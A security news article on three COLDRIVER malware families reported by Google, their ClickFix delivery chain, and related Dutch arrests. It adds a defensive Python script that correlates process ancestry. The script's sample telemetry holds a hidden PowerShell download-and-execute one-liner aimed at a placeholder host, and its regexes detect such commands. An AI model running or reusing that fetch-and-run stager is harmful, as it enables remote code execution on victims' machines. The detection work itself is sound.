Google Identifies Three New Russian Malware Families Linked to COLDRIVER Hackers

Google Threat Intelligence Group (GTIG) has uncovered three new malware families developed by the Russian-linked hacking group COLDRIVER, signaling an accelerated “operations tempo” since May 2025.

The malware, named NOROBOT, YESROBOT, and MAYBEROBOT, appears to be a coordinated suite connected through a shared delivery chain, according to GTIG researcher Wesley Shields.


Background on COLDRIVER

  • Historically, COLDRIVER targeted NGO personnel, policy advisors, and dissidents to steal credentials.
  • The new malware activity marks a shift toward broader infection strategies, using ClickFix-style HTML lures and fake CAPTCHA prompts to execute malicious PowerShell commands via the Windows Run dialog.
  • The group’s previous malware, LOSTKEYS, has not been observed in the wild since its public disclosure earlier in 2025.

Malware Families Overview

| Malware | Functionality | Notes | Alternate Names (Zscaler) |
|---|---|---|---|
| NOROBOT | Initial DLL drop via ClickFix lure; executed with rundll32.exe | Constantly evolving cryptography and delivery chain | |
| YESROBOT | Minimal Python backdoor; HTTPS-based C2, download/execute files, retrieve documents | Stopgap solution deployed briefly after LOSTKEYS disclosure; only two observed instances | |
| MAYBEROBOT | PowerShell-based implant; can download/run payloads, execute commands via cmd.exe, run PowerShell code | More flexible and extensible than YESROBOT; likely used for high-value targets | SIMPLEFIX |

Infection Chain

  1. Victim interacts with COLDCOPY HTML lure → drops NOROBOT DLL.
  2. NOROBOT executes → deploys next-stage malware (YESROBOT or MAYBEROBOT).
  3. YESROBOT or MAYBEROBOT connects to hard-coded C2 servers for command execution and data collection.

“NOROBOT and its infection chain have been constantly evolved—initially simplified for deployment success, later reintroducing complexity such as split cryptography keys,” Shields said.


Operational Insights

  • YESROBOT was deployed briefly as a temporary solution following public disclosure of LOSTKEYS.
  • MAYBEROBOT became the mainstay implant, likely reserved for high-value targets previously compromised via phishing.
  • NOROBOT’s earlier versions included a full Python 3.8 installation, a noisy artifact likely to attract detection.
  • The overall goal: intelligence collection from compromised devices.
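The infection chain above (Run-dialog PowerShell, then a rundll32-executed DLL, then a scripted implant) and the noisy Python artifact noted in the Operational Insights both surface in endpoint process telemetry, so a defender can triage them as a linked process ancestry rather than as isolated alerts. The following Python is an added example written for this page, not GTIG's, Zscaler's or the article's code. It reads Sysmon Event ID 1-style process-creation records (constructed here; every path, PID, URL and command line is a placeholder, not a COLDRIVER indicator) and chains three heuristics through parent PIDs: PowerShell launched from explorer.exe with hidden/encoded/download flags, which is how a pasted Run-dialog command appears; rundll32.exe loading a DLL from a user-writable directory; and python.exe executing from a user-writable path, on the assumption that a dropped interpreter is where the Python 3.8 artifact would show up. The field names, directory list and flag regex are this example's own assumptions to be tuned per environment.

```python
"""Process-ancestry triage for a ClickFix -> rundll32 -> scripted-implant chain.

Added example for this page, not GTIG's or the article's code. Input records
mimic Sysmon Event ID 1 fields; the sample events below are constructed and
contain no real indicators.
"""
import re
from dataclasses import dataclass

# Directories an unprivileged user can write to (assumed list; extend as needed).
USER_WRITABLE = re.compile(
    r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.IGNORECASE
)
# Flags typical of a command pasted into the Run dialog: hidden window,
# encoded body, or in-memory download-and-execute (heuristic, not exhaustive).
PS_SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|invoke-expression|downloadstring)",
    re.IGNORECASE,
)


@dataclass
class Event:
    pid: int
    ppid: int
    image: str         # full path of the created process
    parent_image: str  # full path of the parent process
    cmdline: str


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def stage_of(ev):
    """Label a single event if it matches one of the three heuristics, else None."""
    img, parent = basename(ev.image), basename(ev.parent_image)
    if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
            and PS_SUSPICIOUS.search(ev.cmdline):
        return "clickfix_run_dialog"
    if img == "rundll32.exe" and USER_WRITABLE.search(ev.cmdline):
        return "rundll32_userwritable_dll"
    if img == "python.exe" and USER_WRITABLE.search(ev.image):
        # Assumption: a dropped interpreter (cf. the noisy Python 3.8 install).
        return "python_userwritable"
    return None


def find_chains(events):
    """For each matched event, walk its parents and return the ordered stage list."""
    by_pid = {e.pid: e for e in events}
    chains = []
    for ev in events:
        stage = stage_of(ev)
        if stage is None:
            continue
        path, cur = [stage], ev
        while cur.ppid in by_pid:          # stop at the root of the recorded tree
            cur = by_pid[cur.ppid]
            s = stage_of(cur)
            if s:
                path.insert(0, s)          # ancestors go first, oldest at index 0
        chains.append((ev.pid, path))
    return chains


def score(chains):
    """Most distinct matched stages linked in one ancestry (3 = full chain)."""
    return max((len(set(p)) for _, p in chains), default=0)


# Constructed sample telemetry: one full chain plus a benign rundll32 launch.
SAMPLE_EVENTS = [
    Event(100, 1, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    Event(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\explorer.exe",
          'powershell -w hidden -c "iex (New-Object Net.WebClient).DownloadString(\'http://placeholder.invalid/x\')"'),
    Event(300, 200, r"C:\Windows\System32\rundll32.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"rundll32.exe C:\Users\alice\AppData\Local\Temp\stage.dll,Entry"),
    Event(400, 300, r"C:\Users\alice\AppData\Local\Temp\py38\python.exe",
          r"C:\Windows\System32\rundll32.exe",
          r"python.exe C:\Users\alice\AppData\Local\Temp\py38\agent.py"),
    # Benign: rundll32 against a System32 DLL, parented by explorer.exe.
    Event(500, 100, r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
          "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    found = find_chains(SAMPLE_EVENTS)
    for pid, path in found:
        print(pid, " -> ".join(path))
    print("chain depth:", score(found))
```

Each heuristic on its own is noisy (explorer-parented PowerShell is common on admin workstations), which is why the example correlates by ancestry: a single process tree that trips all three stages is far rarer than any one of them, and the `score` value is what an analyst would alert on. Feeding it real telemetry means mapping your EDR or Sysmon fields onto `Event` and tuning `USER_WRITABLE` and `PS_SUSPICIOUS` to your environment.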

Related Legal Developments

In parallel, the Netherlands’ Public Prosecution Service (OM) arrested three 17-year-olds suspected of providing cyber services to a foreign government.

  • One suspect reportedly collaborated with a Russian-affiliated hacker group to map Wi-Fi networks in The Hague.
  • Two suspects were arrested on September 22, 2025; the third remains under house arrest due to a limited role.

“The information collected was shared with the client for a fee and could be used for digital espionage and cyberattacks,” OM stated.


Key Takeaways

  1. COLDRIVER has accelerated malware development, moving from LOSTKEYS to the NOROBOT/YESROBOT/MAYBEROBOT families within days.
  2. YESROBOT served as a rapid-response implant, while MAYBEROBOT offers more flexibility and operational stealth.
  3. High-value targets remain the primary focus, with constant evolution aimed at evading detection.
